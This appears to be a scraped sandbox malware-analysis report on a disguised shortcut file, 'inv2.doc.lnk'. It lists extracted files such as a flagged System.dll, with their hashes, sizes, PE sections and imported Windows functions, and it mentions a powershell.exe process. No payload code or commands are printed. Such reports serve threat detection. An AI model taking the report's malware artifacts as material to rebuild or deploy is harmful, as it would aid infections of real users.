CharNextA

CharNextW

CharPrevW

CheckDlgButton

CloseClipboard

CreateDialogParamW

CreatePopupMenu

CreateWindowExW

DefWindowProcW

DestroyWindow

DialogBoxParamW

DispatchMessageW

DrawTextW

EmptyClipboard

EnableMenuItem

EnableWindow

EndDialog

EndPaint

ExitWindowsEx

FillRect

FindWindowExW

GetClassInfoW

GetClientRect

GetDC

GetDlgItem

GetDlgItemTextW

GetMessagePos

GetSysColor

GetSystemMenu

GetSystemMetrics

GetWindowLongW

GetWindowRect

InvalidateRect

IsWindow

IsWindowEnabled

IsWindowVisible

LoadBitmapW

LoadCursorW

LoadImageW

MessageBoxIndirectW

OpenClipboard

PeekMessageW

PostQuitMessage

RegisterClassW

ReleaseDC

ScreenToClient

SendMessageTimeoutW

SendMessageW

SetClassLongW

SetClipboardData

SetCursor

SetDlgItemTextW

SetForegroundWindow

SetTimer

SetWindowLongW

SetWindowPos

SetWindowTextW

ShowWindow

SystemParametersInfoW

TrackPopupMenu

wsprintfA

wsprintfW

GetFileVersionInfoSizeW

GetFileVersionInfoW

VerQueryValueW

System.dll

Overview Download Disabled Extended File Details VirusTotal Report Metadefender Report Hash Seen Before

Size
12KiB (11776 bytes)

Type
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

AV Scan Result
Labeled as "W32.eHeur" (1/80)

Runtime Process
exE (PID: 3592)

MD5

ca332bb753b0775d5e806e236ddcec55

SHA1

f35ef76592f20850baef2ebbd3c9a2cfb5ad8d8f

SHA256

df5ae79fa558dc7af244ec6e53939563b966e7dbd8867e114e928678dbd56e5d

Extended File Details

System.dll

Filename: System.dll
Size: 12KiB (11776 bytes)
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Architecture
: 32 Bit
MD5
: ca332bb753b0775d5e806e236ddcec55
SHA1
: f35ef76592f20850baef2ebbd3c9a2cfb5ad8d8f
SHA256
: df5ae79fa558dc7af244ec6e53939563b966e7dbd8867e114e928678dbd56e5d
SHA512
: 2de0956a1ad58ad7086e427e89b819089f2a7f1e4133ed2a0a736adc0614e8588ebe2d97f1b59ab8886d662aeb40e0b4838c6a65fbfc652253e3a45664a03a00
ssdeep
: 192:eo24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol6Sl:k8QIl975eXqlWBrz7YLOl6
imphash
: fc0224e99e736751432961db63a41b76
authentihash
: 017d3a6d4b3fe338fd7edfe81dc56dbdae2506a4a1beccf973f5a7400f061723

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .text Entropy 6.2442942961 Virtual Address 0x1000 Virtual Size 0x1e0f Raw Size 0x2000 MD5 01d0d9529e34a1126b662dba254b1cc1	.text	6.2442942961	0x1000	0x1e0f	0x2000	01d0d9529e34a1126b662dba254b1cc1
Name .rdata Entropy 3.88841650164 Virtual Address 0x3000 Virtual Size 0x353 Raw Size 0x400 MD5 8f64289117e3a5b77b7bc9d89e2dd410	.rdata	3.88841650164	0x3000	0x353	0x400	8f64289117e3a5b77b7bc9d89e2dd410
Name .data Entropy 0.349885353835 Virtual Address 0x4000 Virtual Size 0x78 Raw Size 0x200 MD5 ae9e25337070a01c2851c356a342bcfc	.data	0.349885353835	0x4000	0x78	0x200	ae9e25337070a01c2851c356a342bcfc
Name .reloc Entropy 3.71070177504 Virtual Address 0x5000 Virtual Size 0x262 Raw Size 0x400 MD5 a3daaad2875b8f4ecb924e40d6a8ba3d	.reloc	3.71070177504	0x5000	0x262	0x400	a3daaad2875b8f4ecb924e40d6a8ba3d

File Imports

FreeLibrary

GetLastError

GetModuleHandleW

GetProcAddress

GlobalAlloc

GlobalFree

GlobalSize

LoadLibraryW

lstrcpynW

lstrcpyW

lstrlenW

MultiByteToWideChar

VirtualAlloc

VirtualFree

VirtualProtect

WideCharToMultiByte

CLSIDFromString

StringFromGUID2

wsprintfW

Clean 1
- unternehmen.jsp
  
  Download Disabled VirusTotal Report Hash Seen Before
  
  Size
  13KiB (13141 bytes)
  
  Type
  HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
  
  AV Scan Result
  0/55
  
  Runtime Process
  exE (PID: 3592)
  
  MD5
  
  112e359c8f4faff029f0c2485f87776b
  
  SHA1
  
  cc3789203b59f1a884985d6d8402ae4c34b13517
  
  SHA256
  
  ec835ef3b1d41058f56eb92c8887e993f9a5a0ad84ab6977bf5b3e14590adad9

Informative 6
- O2C5X4FOXJSAPSMSRUYH.temp
  
  Download Disabled Hash Seen Before
  
  Size
  7.8KiB (8016 bytes)
  
  Type
  data
  
  Runtime Process
  powershell.exe (PID: 2612)
  
  MD5
  
  21f9969362bbc202df0cbd6c4a8e50c9
  
  SHA1
  
  62bc816d70453da6839e5457749c42e182fbcb39
  
  SHA256
  
  18f4142318b5be465f5bdf6d5910d673f533e76c10c3acb22820571881d3f30d
- DK6uDL.QaY5YZv
  
  Download Disabled Hash Seen Before
  
  Size
  71KiB (72487 bytes)
  
  Type
  data
  
  Runtime Process
  exE (PID: 3592)
  
  MD5
  
  dbaabb93f493426ddc8f11cd3b31edcc
  
  SHA1
  
  6ecf83beeed303a0b2541a3df964354bdb57ae9b
  
  SHA256
  
  55f134d02d953d0cbc5f014e768ebcb7fd7cff7050f3461de0755c4b082c6244
- ext.default.css
  
  Download Disabled Hash Seen Before
  
  Size
  5.9KiB (6068 bytes)
  
  Type
  ASCII text
  
  Runtime Process
  exE (PID: 3592)
  
  MD5
  
  4680315c26479be48c58d7594310ce60
  
  SHA1
  
  3e7868549a35780d7838047f3f5af3eddf81aea1
  
  SHA256
  
  4cb2cd89886d1d11c90461c84533f230fa6d253562696c100a27d3c45681b55e
- ie179663103.css
  
  Overview Download Disabled Hash Seen Before
  
  Size
  4.5KiB (4637 bytes)
  
  Type
  ASCII text
  
  Runtime Process
  exE (PID: 3592)
  
  MD5
  
  58a2af1813aec98e3abfa061f6e41817
  
  SHA1
  
  f0e3732d5f2fc6ac13a13d49bf361ef1f4a2f8d6
  
  SHA256
  
  64b6cea996e39510103edf47c1613a38238b6f46f7ff8a1b009e45e5362311ac
- jquery.cycle2.tile.min.js
  
  Overview Download Disabled Hash Seen Before
  
  Size
  1.9KiB (1957 bytes)
  
  Type
  ASCII text, with very long lines, with CRLF line terminators
  
  Runtime Process
  exE (PID: 3592)
  
  MD5
  
  5cbfd30b5cd26645861bbc1be2a3f910
  
  SHA1
  
  1d90411b6467d94ad8c7782d4c22255959d33bfb
  
  SHA256
  
  c85b83d00c3730368ad004e6b28233c68f1de8cfcd3b4f0169c8ad206eb13327
- lang-en.js
  
  Download Disabled Hash Seen Before
  
  Size
  685B (685 bytes)
  
  Type
  UTF-8 Unicode text
  
  Runtime Process
  exE (PID: 3592)
  
  MD5
  
  c1ed5be339c4b8ef8b1a36942a5e40bc
  
  SHA1
  
  ee055c881a9d137d157fc61834c2e25ee1fb090c
  
  SHA256
  
  967a7c6425de0d66d6bdf9be746724046b98720bebcb90bcddb96047d93c27ed

inv2.doc.lnk

Incident Response

Risk Assessment

Indicators

Malicious Indicators 9

Suspicious Indicators 16

Informative 16

File Details

inv2.doc.lnk

Resources

Visualization

Classification (TrID)

Screenshots

System Resource Monitor

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Memory Forensics

Suricata Alerts

Extracted Strings

Extracted Files

Malicious 2

Roaming.exE

System.dll

Clean 1

unternehmen.jsp

Informative 6

O2C5X4FOXJSAPSMSRUYH.temp

DK6uDL.QaY5YZv

ext.default.css

ie179663103.css

jquery.cycle2.tile.min.js

lang-en.js

Notifications

Runtime

Community

Latest News

Vetting required

Request Report Deletion

Link